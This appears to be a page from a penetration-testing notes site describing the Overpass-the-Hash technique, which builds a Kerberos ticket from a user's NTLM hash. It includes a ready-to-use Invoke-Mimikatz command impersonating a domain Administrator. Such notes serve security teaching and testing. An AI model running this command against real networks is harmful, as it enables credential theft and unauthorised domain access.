Ctrlk
GithubTwitter
For the complete documentation index, see llms.txt. This page is also available as Markdown.

Overpass the Hash

General

  • Similar to pass-the-hash

  • Creates valid kerberos ticket from NTLM hash of user

  • Able to access any domain service and not just services that support NTLM authentication like in PTH attacks

Exploitation with Invoke-Mimikatz

Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:lab.local /ntlm:<HASH> /run:powershell.exe"'
PreviousDC SyncNextTicket Harvesting

Last updated